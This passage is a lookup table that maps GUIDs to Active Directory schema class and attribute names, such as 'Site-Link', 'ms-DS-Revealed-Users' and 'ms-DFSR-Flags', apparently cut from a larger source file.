"6e8797c4-acda-4a49-8740-b0bd05a9b831": "ms-SPP-Confirmation-Id",
"b40ff825-427a-11d1-a9c2-0000f80367c1": "Ipsec-Base",
"bf967ab2-0de6-11d0-a285-00aa003049e2": "Service-Instance",
"5fd42463-1262-11d0-a060-00aa006c33ed": "Address-Syntax",
"b40ff81f-427a-11d1-a9c2-0000f80367c1": "Ipsec-Data",
"778ff5c9-6f4e-4b74-856a-d68383313910": "ms-DS-KrbTgt-Link",
"e2704852-3b7b-11d2-90cc-00c04fd91ab1": "MSMQ-Site-Gates-Mig",
"bf967a2d-0de6-11d0-a285-00aa003049e2": "Search-Flags",
"098f368e-4812-48cd-afb7-a136b96807ed": "ms-SPP-Online-License",
"5fd42464-1262-11d0-a060-00aa006c33ed": "Address-Type",
"b40ff81e-427a-11d1-a9c2-0000f80367c1": "Ipsec-Data-Type",
"185c7821-3749-443a-bd6a-288899071adb": "ms-DS-Revealed-Users",
"9a0dc340-c100-11d1-bbc5-0080c76670c0": "MSMQ-Site-ID",
"bf967a2e-0de6-11d0-a285-00aa003049e2": "Search-Guide",
"67e4d912-f362-4052-8c79-42f45ba7b221": "ms-SPP-Phone-License",
"b40ff826-427a-11d1-a9c2-0000f80367c1": "Ipsec-Filter",
"5fe69b0b-e146-4f15-b0ab-c1e5d488e094": "simpleSecurityObject",
"553fd038-f32e-11d0-b0bc-00c04fd8dca6": "Admin-Context-Menu",
"b40ff823-427a-11d1-a9c2-0000f80367c1": "Ipsec-Filter-Reference",
"1d3c2d18-42d0-4868-99fe-0eca1e6fa9f3": "ms-DS-Has-Full-Replica-NCs",
"ffadb4b2-de39-11d1-90a5-00c04fd91ab1": "MSMQ-Site-Name",
"01072d9a-98ad-4a53-9744-e83e287278fb": "secretary",
"0353c4b5-d199-40b0-b3c5-deb32fd9ec06": "ms-SPP-Config-License",
"bf967918-0de6-11d0-a285-00aa003049e2": "Admin-Count",
"b40ff81d-427a-11d1-a9c2-0000f80367c1": "Ipsec-ID",
"15585999-fd49-4d66-b25d-eeb96aba8174": "ms-DS-Never-Reveal-Group",
"422144fa-c17f-4649-94d6-9731ed2784ed": "MSMQ-Site-Name-Ex",
"bf967a2f-0de6-11d0-a285-00aa003049e2": "Security-Identifier",
"1075b3a1-bbaf-49d2-ae8d-c4f25c823303": "ms-SPP-Issuance-License",
"b40ff828-427a-11d1-a9c2-0000f80367c1": "Ipsec-ISAKMP-Policy",
"bf967ab3-0de6-11d0-a285-00aa003049e2": "Site",
"bf967919-0de6-11d0-a285-00aa003049e2": "Admin-Description",
"b40ff820-427a-11d1-a9c2-0000f80367c1": "Ipsec-ISAKMP-Reference",
"303d9f4a-1dd6-4b38-8fc5-33afe8c988ad": "ms-DS-Reveal-OnDemand-Group",
"9a0dc32a-c100-11d1-bbc5-0080c76670c0": "MSMQ-Sites",
"bf967a31-0de6-11d0-a285-00aa003049e2": "See-Also",
"19d706eb-4d76-44a2-85d6-1c342be3be37": "ms-TPM-Srk-Pub-Thumbprint",
"bf96791a-0de6-11d0-a285-00aa003049e2": "Admin-Display-Name",
"b40ff81c-427a-11d1-a9c2-0000f80367c1": "Ipsec-Name",
"aa156612-2396-467e-ad6a-28d23fdb1865": "ms-DS-Secondary-KrbTgt-Number",
"9a0dc329-c100-11d1-bbc5-0080c76670c0": "MSMQ-Transactional",
"ddac0cf2-af8f-11d0-afeb-00c04fd930c9": "Seq-Notification",
"c894809d-b513-4ff8-8811-f4f43f5ac7bc": "ms-TPM-Owner-Information-Temp",
"b40ff827-427a-11d1-a9c2-0000f80367c1": "Ipsec-Negotiation-Policy",
"d50c2cde-8951-11d1-aebc-0000f80367c1": "Site-Link",
"18f9b67d-5ac6-4b3b-97db-d0a406afb7ba": "Admin-Multiselect-Property-Pages",
"07383075-91df-11d1-aebc-0000f80367c1": "IPSEC-Negotiation-Policy-Action",
"94f6f2ac-c76d-4b5e-b71f-f332c3e93c22": "ms-DS-Revealed-DSAs",
"c58aae32-56f9-11d2-90d0-00c04fd91ab1": "MSMQ-User-Sid",
"bf967a32-0de6-11d0-a285-00aa003049e2": "Serial-Number",
"ea1b7b93-5e48-46d5-bc6c-4df4fda78a35": "ms-TPM-Tpm-Information-For-Computer",
"52458038-ca6a-11d0-afff-0000f80367c1": "Admin-Property-Pages",
"b40ff822-427a-11d1-a9c2-0000f80367c1": "Ipsec-Negotiation-Policy-Reference",
"5dd68c41-bfdf-438b-9b5d-39d9618bf260": "ms-DS-KrbTgt-Link-BL",
"9a0dc336-c100-11d1-bbc5-0080c76670c0": "MSMQ-Version",
"09dcb7a0-165f-11d0-a064-00aa006c33ed": "Server-Name",
"14fa84c9-8ecd-4348-bc91-6d3ced472ab7": "ms-TPM-Tpm-Information-For-Computer-BL",
"b40ff829-427a-11d1-a9c2-0000f80367c1": "Ipsec-NFA",
"d50c2cdf-8951-11d1-aebc-0000f80367c1": "Site-Link-Bridge",
"9a7ad940-ca53-11d1-bbd0-0080c76670c0": "Allowed-Attributes",
"07383074-91df-11d1-aebc-0000f80367c1": "IPSEC-Negotiation-Policy-Type",
"c8bc72e0-a6b4-48f0-94a5-fd76a88c9987": "ms-DS-Is-Full-Replica-For",
"db0c9085-c1f2-11d1-bbc5-0080c76670c0": "msNPAllowDialin",
"26d9736d-6070-11d1-a9c6-0000f80367c1": "Server-Reference",
"0be0dd3b-041a-418c-ace9-2f17d23e9d42": "ms-DNS-Keymaster-Zones",
"9a7ad941-ca53-11d1-bbd0-0080c76670c0": "Allowed-Attributes-Effective",
"b40ff821-427a-11d1-a9c2-0000f80367c1": "Ipsec-NFA-Reference",
"ff155a2a-44e5-4de0-8318-13a58988de4f": "ms-DS-Is-Domain-For",
"db0c9089-c1f2-11d1-bbc5-0080c76670c0": "msNPCalledStationID",
"26d9736e-6070-11d1-a9c6-0000f80367c1": "Server-Reference-BL",
"aa12854c-d8fc-4d5e-91ca-368b8d829bee": "ms-DNS-Is-Signed",
"b7b13121-b82e-11d0-afee-0000f80367c1": "Ipsec-Policy",
"7a4117da-cd67-11d0-afff-0000f80367c1": "Sites-Container",
"9a7ad942-ca53-11d1-bbd0-0080c76670c0": "Allowed-Child-Classes",
"b40ff824-427a-11d1-a9c2-0000f80367c1": "Ipsec-Owners-Reference",
"37c94ff6-c6d4-498f-b2f9-c6f7f8647809": "ms-DS-Is-Partial-Replica-For",
"db0c908a-c1f2-11d1-bbc5-0080c76670c0": "msNPCallingStationID",
"bf967a33-0de6-11d0-a285-00aa003049e2": "Server-Role",
"c79f2199-6da1-46ff-923c-1f3f800c721e": "ms-DNS-Sign-With-NSEC3",
"9a7ad943-ca53-11d1-bbd0-0080c76670c0": "Allowed-Child-Classes-Effective",
"b7b13118-b82e-11d0-afee-0000f80367c1": "Ipsec-Policy-Reference",
"fe01245a-341f-4556-951f-48c033a89050": "ms-DS-Is-User-Cachable-At-Rodc",
"db0c908e-c1f2-11d1-bbc5-0080c76670c0": "msNPSavedCallingStationID",
"bf967a34-0de6-11d0-a285-00aa003049e2": "Server-State",
"7bea2088-8ce2-423c-b191-66ec506b1595": "ms-DNS-NSEC3-OptOut",
"bf967a9e-0de6-11d0-a285-00aa003049e2": "Leaf",
"bf967ab5-0de6-11d0-a285-00aa003049e2": "Storage",
"00fbf30c-91fe-11d1-aebc-0000f80367c1": "Alt-Security-Identities",
"00fbf30d-91fe-11d1-aebc-0000f80367c1": "Is-Critical-System-Object",
"cbdad11c-7fec-387b-6219-3a0627d9af81": "ms-DS-Revealed-List",
"db0c909c-c1f2-11d1-bbc5-0080c76670c0": "msRADIUSCallbackNumber",
"b7b1311c-b82e-11d0-afee-0000f80367c1": "Service-Binding-Information",
"0dc063c1-52d9-4456-9e15-9c2434aafd94": "ms-DNS-Maintain-Trust-Anchor",
"45b01500-c419-11d1-bbc9-0080c76670c0": "ANR",
"28630ebe-41d5-11d1-a9c1-0000f80367c1": "Is-Defunct",
"aa1c88fd-b0f6-429f-b2ca-9d902266e808": "ms-DS-Revealed-List-BL",
"db0c90a4-c1f2-11d1-bbc5-0080c76670c0": "msRADIUSFramedIPAddress",
"bf967a35-0de6-11d0-a285-00aa003049e2": "Service-Class-ID",
"5c5b7ad2-20fa-44bb-beb3-34b9c0f65579": "ms-DNS-DS-Record-Algorithms",
"1be8f17d-a9ff-11d0-afe2-00c04fd930c9": "Licensing-Site-Settings",
"b7b13124-b82e-11d0-afee-0000f80367c1": "Subnet",
"96a7dd65-9118-11d1-aebc-0000f80367c1": "App-Schema-Version",
"bf96798f-0de6-11d0-a285-00aa003049e2": "Is-Deleted",
"011929e6-8b5d-4258-b64a-00b0b4949747": "ms-DS-Last-Successful-Interactive-Logon-Time",
"db0c90a9-c1f2-11d1-bbc5-0080c76670c0": "msRADIUSFramedRoute",
"bf967a36-0de6-11d0-a285-00aa003049e2": "Service-Class-Info",
"27d93c40-065a-43c0-bdd8-cdf2c7d120aa": "ms-DNS-RFC5011-Key-Rollovers",
"dd712226-10e4-11d0-a05f-00aa006c33ed": "Application-Name",
"f4c453f0-c5f1-11d1-bbcb-0080c76670c0": "Is-Ephemeral",
"c7e7dafa-10c3-4b8b-9acd-54f11063742e": "ms-DS-Last-Failed-Interactive-Logon-Time",
"db0c90b6-c1f2-11d1-bbc5-0080c76670c0": "msRADIUSServiceType",
"b7b1311d-b82e-11d0-afee-0000f80367c1": "Service-Class-Name",
"ff9e5552-7db7-4138-8888-05ce320a0323": "ms-DNS-NSEC3-Hash-Algorithm",
"ddac0cf5-af8f-11d0-afeb-00c04fd930c9": "Link-Track-Object-Move-Table",
"b7b13125-b82e-11d0-afee-0000f80367c1": "Subnet-Container",
"8297931d-86d3-11d0-afda-00c04fd930c9": "Applies-To",
"bf967991-0de6-11d0-a285-00aa003049e2": "Is-Member-Of-DL",
"dc3ca86f-70ad-4960-8425-a4d6313d93dd": "ms-DS-Failed-Interactive-Logon-Count",
"db0c90c5-c1f2-11d1-bbc5-0080c76670c0": "msRASSavedCallbackNumber",
"28630eb8-41d5-11d1-a9c1-0000f80367c1": "Service-DNS-Name",
"13361665-916c-4de7-a59d-b1ebbd0de129": "ms-DNS-NSEC3-Random-Salt-Length",
"ba305f75-47e3-11d0-a1a6-00c04fd930c9": "Asset-Number",
"19405b9d-3cfa-11d1-a9c0-0000f80367c1": "Is-Member-Of-Partial-Attribute-Set",
"c5d234e5-644a-4403-a665-e26e0aef5e98": "ms-DS-Failed-Interactive-Logon-Count-At-Last-Successful-Logon",
"db0c90c6-c1f2-11d1-bbc5-0080c76670c0": "msRASSavedFramedIPAddress",
"28630eba-41d5-11d1-a9c1-0000f80367c1": "Service-DNS-Name-Type",
"80b70aab-8959-4ec0-8e93-126e76df3aca": "ms-DNS-NSEC3-Iterations",
"ddac0cf7-af8f-11d0-afeb-00c04fd930c9": "Link-Track-OMT-Entry",
"0296c11c-40da-11d1-a9c0-0000f80367c1": "Assistant",
"19405b9c-3cfa-11d1-a9c0-0000f80367c1": "Is-Privilege-Holder",
"31f7b8b6-c9f8-4f2d-a37b-58a823030331": "ms-DS-USN-Last-Sync-Success",
"db0c90c7-c1f2-11d1-bbc5-0080c76670c0": "msRASSavedFramedRoute",
"bf967a37-0de6-11d0-a285-00aa003049e2": "Service-Instance-Version",
"8f4e317f-28d7-442c-a6df-1f491f97b326": "ms-DNS-DNSKEY-Record-Set-TTL",
"bf967ab8-0de6-11d0-a285-00aa003049e2": "Trusted-Domain",
"398f63c0-ca60-11d1-bbd1-0000f81f10c0": "Assoc-NT-Account",
"8fb59256-55f1-444b-aacb-f5b482fe3459": "Is-Recycled",
"78fc5d84-c1dc-3148-8984-58f792d41d3e": "ms-DS-Value-Type-Reference",
"bf9679d3-0de6-11d0-a285-00aa003049e2": "Must-Contain",
"f3a64788-5306-11d1-a9c5-0000f80367c1": "Service-Principal-Name",
"29869b7c-64c4-42fe-97d5-fbc2fa124160": "ms-DNS-DS-Record-Set-TTL",
"ddac0cf6-af8f-11d0-afeb-00c04fd930c9": "Link-Track-Vol-Entry",
"3320fc38-c379-4c17-a510-1bdf6133c5da": "associatedDomain",
"bf967992-0de6-11d0-a285-00aa003049e2": "Is-Single-Valued",
"ab5543ad-23a1-3b45-b937-9b313d5474a8": "ms-DS-Value-Type-Reference-BL",
"80212840-4bdc-11d1-a9c4-0000f80367c1": "Name-Service-Flags",
"7d6c0e97-7e20-11d0-afd6-00c04fd930c9": "Setup-Command",
"03d4c32e-e217-4a61-9699-7bbc4729a026": "ms-DNS-Signature-Inception-Offset",
"281416e2-1968-11d0-a28f-00aa003049e2": "Type-Library",
"f7fbfc45-85ab-42a4-a435-780e62f7858b": "associatedName",
"bac80572-09c4-4fa9-9ae6-7628d7adbe0e": "jpegPhoto",
"8a0560c1-97b9-4811-9db7-dc061598965b": "ms-DS-Optional-Feature-Flags",
"bf9679d6-0de6-11d0-a285-00aa003049e2": "NC-Name",
"553fd039-f32e-11d0-b0bc-00c04fd8dca6": "Shell-Context-Menu",
"f6b0f0be-a8e4-4468-8fd9-c3c47b8722f9": "ms-DNS-Secure-Delegation-Polling-Period",
"ddac0cf4-af8f-11d0-afeb-00c04fd930c9": "Link-Track-Volume-Table",
"fa4693bb-7bc2-4cb9-81a8-c99c43b7905e": "attributeCertificateAttribute",
"bf967993-0de6-11d0-a285-00aa003049e2": "Keywords",
"bf9679d8-0de6-11d0-a285-00aa003049e2": "NETBIOS-Name",
"52458039-ca6a-11d0-afff-0000f80367c1": "Shell-Property-Pages",
"3443d8cd-e5b6-4f3b-b098-659a0214a079": "ms-DNS-Signing-Key-Descriptors",
"bf967abb-0de6-11d0-a285-00aa003049e2": "Volume",
"cb843f80-48d9-11d1-a9c3-0000f80367c1": "Attribute-Display-Names",
"1677581f-47f3-11d1-a9c3-0000f80367c1": "Knowledge-Information",
"07383076-91df-11d1-aebc-0000f80367c1": "netboot-Allow-New-Clients",
"45b01501-c419-11d1-bbc9-0080c76670c0": "Short-Server-Name",
"b7673e6d-cad9-4e9e-b31a-63e8098fdd63": "ms-DNS-Signing-Keys",
"bf967aa0-0de6-11d0-a285-00aa003049e2": "Locality",
"bf967922-0de6-11d0-a285-00aa003049e2": "Attribute-ID",
"c569bb46-c680-44bc-a273-e6c227d71b45": "labeledURI",
"0738307b-91df-11d1-aebc-0000f80367c1": "netboot-Answer-Only-Valid-Clients",
"3e74f60e-3e73-11d1-a9c0-0000f80367c1": "Show-In-Address-Book",
"28c458f5-602d-4ac9-a77c-b3f1be503a7e": "ms-DNS-DNSKEY-Records",
"ad44bb41-67d5-4d88-b575-7b20674e76d8": "PosixAccount",
"bf967924-0de6-11d0-a285-00aa003049e2": "Attribute-Security-GUID",
"1fbb0be8-ba63-11d0-afef-0000f80367c1": "Last-Backup-Restoration-Time",
"0738307a-91df-11d1-aebc-0000f80367c1": "netboot-Answer-Requests",
"bf967984-0de6-11d0-a285-00aa003049e2": "Show-In-Advanced-View-Only",
"285c6964-c11a-499e-96d8-bf7c75a223c6": "ms-DNS-Parent-Has-Secure-Delegation",
"52ab8671-5709-11d1-a9c6-0000f80367c1": "Lost-And-Found",
"bf967925-0de6-11d0-a285-00aa003049e2": "Attribute-Syntax",
"bf967995-0de6-11d0-a285-00aa003049e2": "Last-Content-Indexed",
"5643ff81-35b6-4ca9-9512-baf0bd0a2772": "ms-FRS-Hub-Member",
"07383079-91df-11d1-aebc-0000f80367c1": "netboot-Current-Client-Count",
"17eb4278-d167-11d0-b002-0000f80367c1": "SID-History",
"ba340d47-2181-4ca0-a2f6-fae4479dab2a": "ms-DNS-Propagation-Time",
"5b6d8467-1a18-4174-b350-9cc6e7b4ac8d": "ShadowAccount",
"9a7ad944-ca53-11d1-bbd0-0080c76670c0": "Attribute-Types",
"52ab8670-5709-11d1-a9c6-0000f80367c1": "Last-Known-Parent",
"92aa27e0-5c50-402d-9ec1-ee847def9788": "ms-FRS-Topology-Pref",
"3e978921-8c01-11d0-afda-00c04fd930c9": "Netboot-GUID",
"2a39c5b2-8960-11d1-aebc-0000f80367c1": "Signature-Algorithms",
"aff16770-9622-4fbc-a128-3088777605b9": "ms-DNS-NSEC3-User-Salt",
"11b6cc94-48c4-11d1-a9c3-0000f80367c1": "Meeting",
"d0e1d224-e1a0-42ce-a2da-793ba5244f35": "audio",
"bf967996-0de6-11d0-a285-00aa003049e2": "Last-Logoff",
"1a861408-38c3-49ea-ba75-85481a77c655": "ms-DFSR-Version",
"532570bd-3d77-424f-822f-0d636dc6daad": "Netboot-DUID",
"3e978924-8c01-11d0-afda-00c04fd930c9": "Site-GUID",
"387d9432-a6d1-4474-82cd-0a89aae084ae": "ms-DNS-NSEC3-Current-Salt",
"2a9350b8-062c-4ed0-9903-dde10d06deba": "PosixGroup",
"6da8a4fe-0e52-11d0-a286-00aa003049e2": "Auditing-Policy",
"bf967997-0de6-11d0-a285-00aa003049e2": "Last-Logon",
"78f011ec-a766-4b19-adcf-7b81ed781a4d": "ms-DFSR-Extension",
"3e978920-8c01-11d0-afda-00c04fd930c9": "Netboot-Initialization",
"d50c2cdd-8951-11d1-aebc-0000f80367c1": "Site-Link-List",
"07831919-8f94-4fb6-8a42-91545dccdad3": "ms-Authz-Effective-Security-Policy",
"c9010e74-4e58-49f7-8a89-5e3e2340fcf8": "ms-COM-Partition",
"bf967928-0de6-11d0-a285-00aa003049e2": "Authentication-Options",
"c0e20a04-0e5a-4ff3-9482-5efeaecd7060": "Last-Logon-Timestamp",
"d7d5e8c1-e61f-464f-9fcf-20bbe0a2ec54": "ms-DFSR-RootPath",
"0738307e-91df-11d1-aebc-0000f80367c1": "netboot-IntelliMirror-OSes",
"d50c2cdc-8951-11d1-aebc-0000f80367c1": "Site-List",
"b946bece-09b5-4b6a-b25a-4b63a330e80e": "ms-Authz-Proposed-Security-Policy",
"2517fadf-fa97-48ad-9de6-79ac5721f864": "IpService",
"1677578d-47f3-11d1-a9c3-0000f80367c1": "Authority-Revocation-List",
"bf967998-0de6-11d0-a285-00aa003049e2": "Last-Set-Time",
"90b769ac-4413-43cf-ad7a-867142e740a3": "ms-DFSR-RootSizeInMb",
"07383077-91df-11d1-aebc-0000f80367c1": "netboot-Limit-Clients",
"3e10944c-c354-11d0-aff8-0000f80367c1": "Site-Object",
"8e1685c6-3e2f-48a2-a58d-5af0ea789fa0": "ms-Authz-Last-Effective-Security-Policy",
"250464ab-c417-497a-975a-9e0d459a7ca1": "ms-COM-PartitionSet",
"bf96792c-0de6-11d0-a285-00aa003049e2": "Auxiliary-Class",
"7d6c0e9c-7e20-11d0-afd6-00c04fd930c9": "Last-Update-Sequence",
"86b9a69e-f0a6-405d-99bb-77d977992c2a": "ms-DFSR-StagingPath",
"07383080-91df-11d1-aebc-0000f80367c1": "netboot-Locally-Installed-OSes",
"3e10944d-c354-11d0-aff8-0000f80367c1": "Site-Object-BL",
"80997877-f874-4c68-864d-6e508a83bdbd": "ms-Authz-Resource-Condition",
"9c2dcbd2-fbf0-4dc7-ace0-8356dcd0f013": "IpProtocol",
"bf96792d-0de6-11d0-a285-00aa003049e2": "Bad-Password-Time",
"7359a352-90f7-11d1-aebc-0000f80367c1": "LDAP-Admin-Limits",
"250a8f20-f6fc-4559-ae65-e4b24c67aebe": "ms-DFSR-StagingSizeInMb",
"3e978923-8c01-11d0-afda-00c04fd930c9": "Netboot-Machine-File-Path",
"1be8f17c-a9ff-11d0-afe2-00c04fd930c9": "Site-Server",
"62f29b60-be74-4630-9456-2f6691993a86": "ms-Authz-Central-Access-Policy-ID",
"90df3c3e-1854-4455-a5d7-cad40d56657a": "ms-DS-App-Configuration",
"bf96792e-0de6-11d0-a285-00aa003049e2": "Bad-Pwd-Count",
"bf96799a-0de6-11d0-a285-00aa003049e2": "LDAP-Display-Name",
"5cf0bcc8-60f7-4bff-bda6-aea0344eb151": "ms-DFSR-ConflictPath",
"07383078-91df-11d1-aebc-0000f80367c1": "netboot-Max-Clients",
"26d9736f-6070-11d1-a9c6-0000f80367c1": "SMTP-Mail-Address",
"57f22f7a-377e-42c3-9872-cec6f21d2e3e": "ms-Authz-Member-Rules-In-Central-Access-Policy",
"cadd1e5e-fefc-4f3f-b5a9-70e994204303": "OncRpc",
"1f0075f9-7e40-11d0-afd6-00c04fd930c9": "Birth-Location",
"7359a353-90f7-11d1-aebc-0000f80367c1": "LDAP-IPDeny-List",
"9ad33fc9-aacf-4299-bb3e-d1fc6ea88e49": "ms-DFSR-ConflictSizeInMb",
"2df90d85-009f-11d2-aa4c-00c04fd7d83a": "Netboot-Mirror-Data-File",
"2ab0e76c-7041-11d2-9905-0000f87a57d4": "SPN-Mappings",
"516e67cf-fedd-4494-bb3a-bc506a948891": "ms-Authz-Member-Rules-In-Central-Access-Policy-BL",
"9e67d761-e327-4d55-bc95-682f875e2f8e": "ms-DS-App-Data",
"d50c2cdb-8951-11d1-aebc-0000f80367c1": "Bridgehead-Server-List-BL",
"03726ae7-8e7d-4446-8aae-a91657c00993": "ms-DFSR-Enabled",
"0738307c-91df-11d1-aebc-0000f80367c1": "netboot-New-Machine-Naming-Policy",
"bf967a39-0de6-11d0-a285-00aa003049e2": "State-Or-Province-Name",
"fa32f2a6-f28b-47d0-bf91-663e8f910a72": "ms-DS-Claim-Source",
"ab911646-8827-4f95-8780-5a8f008eb68f": "IpHost",
"d50c2cda-8951-11d1-aebc-0000f80367c1": "Bridgehead-Transport-List",
"bf96799b-0de6-11d0-a285-00aa003049e2": "Link-ID",
"eeed0fc8-1001-45ed-80cc-bbf744930720": "ms-DFSR-ReplicationGroupType",
"0738307d-91df-11d1-aebc-0000f80367c1": "netboot-New-Machine-OU",
"bf967a3a-0de6-11d0-a285-00aa003049e2": "Street-Address",
"92f19c05-8dfa-4222-bbd1-2c4f01487754": "ms-DS-Claim-Source-Type",
"cfee1051-5f28-4bae-a863-5d0cc18a8ed1": "ms-DS-Az-Admin-Manager",
"f87fa54b-b2c5-4fd7-88c0-daccb21d93c5": "buildingName",
"2ae80fe2-47b4-11d0-a1a4-00c04fd930c9": "Link-Track-Secret",
"23e35d4c-e324-4861-a22f-e199140dae00": "ms-DFSR-TombstoneExpiryInMin",
"07383082-91df-11d1-aebc-0000f80367c1": "netboot-SCP-BL",
"3860949f-f6a8-4b38-9950-81ecb6bc2982": "Structural-Object-Class",
"0c2ce4c7-f1c3-4482-8578-c60d4bb74422": "ms-DS-Claim-Is-Value-Space-Restricted",
"d95836c3-143e-43fb-992a-b057f1ecadf9": "IpNetwork",
"bf96792f-0de6-11d0-a285-00aa003049e2": "Builtin-Creation-Time",
"bf96799d-0de6-11d0-a285-00aa003049e2": "Lm-Pwd-History",
"d68270ac-a5dc-4841-a6ac-cd68be38c181": "ms-DFSR-FileFilter",
"07383081-91df-11d1-aebc-0000f80367c1": "netboot-Server",
"bf967a3b-0de6-11d0-a285-00aa003049e2": "Sub-Class-Of",
"cd789fb9-96b4-4648-8219-ca378161af38": "ms-DS-Claim-Is-Single-Valued",
"ddf8de9b-cba5-4e12-842e-28d8b66f75ec": "ms-DS-Az-Application",
"bf967930-0de6-11d0-a285-00aa003049e2": "Builtin-Modified-Count",
"bf96799e-0de6-11d0-a285-00aa003049e2": "Local-Policy-Flags",
"93c7b477-1f2e-4b40-b7bf-007e8d038ccf": "ms-DFSR-DirectoryFilter",
"2df90d84-009f-11d2-aa4c-00c04fd7d83a": "Netboot-SIF-File",
"bf967a3c-0de6-11d0-a285-00aa003049e2": "Sub-Refs",
"1e5d393d-8cb7-4b4f-840a-973b36cc09c3": "ms-DS-Generation-Id",
"72efbf84-6e7b-4a5c-a8db-8a75a7cad254": "NisNetgroup",
"bf967931-0de6-11d0-a285-00aa003049e2": "Business-Category",
"80a67e4d-9f22-11d0-afdd-00c04fd930c9": "Local-Policy-Reference",
"4699f15f-a71f-48e2-9ff5-5897c0759205": "ms-DFSR-Schedule",
"0738307f-91df-11d1-aebc-0000f80367c1": "netboot-Tools",
"9a7ad94d-ca53-11d1-bbd0-0080c76670c0": "SubSchemaSubEntry",
"a13df4e2-dbb0-4ceb-828b-8b2e143e9e81": "ms-DS-Primary-Computer",
"860abe37-9a9b-4fa4-b3d2-b8ace5df9ec5": "ms-DS-Az-Operation",
"ba305f76-47e3-11d0-a1a6-00c04fd930c9": "Bytes-Per-Minute",
"bf9679a1-0de6-11d0-a285-00aa003049e2": "Locale-ID",
"048b4692-6227-4b67-a074-c4437083e14b": "ms-DFSR-Keywords",
"bf9679d9-0de6-11d0-a285-00aa003049e2": "Network-Address",
"963d274c-48be-11d1-a9c3-0000f80367c1": "Super-Scope-Description",
"998c06ac-3f87-444e-a5df-11b03dc8a50c": "ms-DS-Is-Primary-Computer-For",
"7672666c-02c1-4f33-9ecf-f649c1dd9b7c": "NisMap",
"bf967932-0de6-11d0-a285-00aa003049e2": "CA-Certificate",
"bf9679a2-0de6-11d0-a285-00aa003049e2": "Locality-Name",
"fe515695-3f61-45c8-9bfa-19c148c57b09": "ms-DFSR-Flags",
"bf9679da-0de6-11d0-a285-00aa003049e2": "Next-Level-Store",
"963d274b-48be-11d1-a9c3-0000f80367c1": "Super-Scopes",
"db2c48b2-d14d-ec4e-9f58-ad579d8b440e": "ms-Kds-KDF-AlgorithmID",
"8213eac9-9d55-44dc-925c-e9a52b927644": "ms-DS-Az-Role",
"963d2740-48be-11d1-a9c3-0000f80367c1": "CA-Certificate-DN",
"d9e18316-8939-11d1-aebc-0000f80367c1": "Localized-Description",
"d6d67084-c720-417d-8647-b696237a114c": "ms-DFSR-Options",
"bf9679db-0de6-11d0-a285-00aa003049e2": "Next-Rid",
"5245801d-ca6a-11d0-afff-0000f80367c1": "Superior-DNS-Root",
"8a800772-f4b8-154f-b41c-2e4271eff7a7": "ms-Kds-KDF-Param",
"904f8a93-4954-4c5f-b1e1-53c097a31e13": "NisObject",
"963d2735-48be-11d1-a9c3-0000f80367c1": "CA-Connect",
"a746f0d1-78d0-11d2-9916-0000f87a57d4": "Localization-Display-Id",
"1035a8e1-67a8-4c21-b7bb-031cdf99d7a0": "ms-DFSR-ContentSetGuid",
"52458018-ca6a-11d0-afff-0000f80367c1": "Non-Security-Member",
"bf967a3f-0de6-11d0-a285-00aa003049e2": "Supplemental-Credentials",
"1702975d-225e-cb4a-b15d-0daea8b5e990": "ms-Kds-SecretAgreement-AlgorithmID",
"4feae054-ce55-47bb-860e-5b12063a51de": "ms-DS-Az-Scope",
"963d2738-48be-11d1-a9c3-0000f80367c1": "CA-Usages",
"09dcb79f-165f-11d0-a064-00aa006c33ed": "Location",
"e3b44e05-f4a7-4078-a730-f48670a743f8": "ms-DFSR-RdcEnabled",
"52458019-ca6a-11d0-afff-0000f80367c1": "Non-Security-Member-BL",
"1677588f-47f3-11d1-a9c3-0000f80367c1": "Supported-Application-Context",
"30b099d9-edfe-7549-b807-eba444da79e9": "ms-Kds-SecretAgreement-Param",
"a699e529-a637-4b7d-a0fb-5dc466a0b8a7": "IEEE802Device",
"963d2736-48be-11d1-a9c3-0000f80367c1": "CA-WEB-URL",
"bf9679a4-0de6-11d0-a285-00aa003049e2": "Lock-Out-Observation-Window",
"f402a330-ace5-4dc1-8cc9-74d900bf8ae0": "ms-DFSR-RdcMinFileSizeInKb",
"19195a56-6da0-11d0-afd3-00c04fd930c9": "Notification-List",
"bf967a41-0de6-11d0-a285-00aa003049e2": "Surname",
"e338f470-39cd-4549-ab5b-f69f9e583fe0": "ms-Kds-PublicKey-Length",
"1ed3a473-9b1b-418a-bfa0-3a37b95a5306": "ms-DS-Az-Task",
"d9e18314-8939-11d1-aebc-0000f80367c1": "Can-Upgrade-Script",
"bf9679a5-0de6-11d0-a285-00aa003049e2": "Lockout-Duration",
"2cc903e2-398c-443b-ac86-ff6b01eac7ba": "ms-DFSR-DfsPath",
"bf9679df-0de6-11d0-a285-00aa003049e2": "NT-Group-Members",
"037651e4-441d-11d1-a9c3-0000f80367c1": "Sync-Attributes",
"615f42a1-37e7-1148-a0dd-3007e09cfc81": "ms-Kds-PrivateKey-Length",
"4bcb2477-4bb3-4545-a9fc-fb66e136b435": "BootableDevice",
"9a7ad945-ca53-11d1-bbd0-0080c76670c0": "Canonical-Name",
"bf9679a6-0de6-11d0-a285-00aa003049e2": "Lockout-Threshold",
"51928e94-2cd8-4abe-b552-e50412444370": "ms-DFSR-RootFence",
"3e97891f-8c01-11d0-afda-00c04fd930c9": "NT-Mixed-Domain",
"037651e3-441d-11d1-a9c3-0000f80367c1": "Sync-Membership",
"26627c27-08a2-0a40-a1b1-8dce85b42993": "ms-Kds-RootKeyData",
"44f00041-35af-468b-b20a-6ce8737c580b": "ms-DS-Optional-Feature",
"d4159c92-957d-4a87-8a67-8d2934e01649": "carLicense",
"28630ebf-41d5-11d1-a9c1-0000f80367c1": "Lockout-Time",
"2dad8796-7619-4ff8-966e-0a5cc67b287f": "ms-DFSR-ReplicationGroupGuid",
"bf9679e2-0de6-11d0-a285-00aa003049e2": "Nt-Pwd-History",
"037651e2-441d-11d1-a9c3-0000f80367c1": "Sync-With-Object",
"d5f07340-e6b0-1e4a-97be-0d3318bd9db1": "ms-Kds-Version",
"d6710785-86ff-44b7-85b5-f1f8689522ce": "msSFU-30-Mail-Aliases",
"7bfdcb81-4807-11d1-a9c3-0000f80367c1": "Catalogs",
"bf9679a9-0de6-11d0-a285-00aa003049e2": "Logo",
"f7b85ba9-3bf9-428f-aab4-2eee6d56f063": "ms-DFSR-DfsLinkTarget",
"bf9679e3-0de6-11d0-a285-00aa003049e2": "NT-Security-Descriptor",
"037651e5-441d-11d1-a9c3-0000f80367c1": "Sync-With-SID",
"96400482-cf07-e94c-90e8-f2efc4f0495e": "ms-Kds-DomainID",
"3bcd9db8-f84b-451c-952f-6c52b81f9ec6": "ms-DS-Password-Settings",
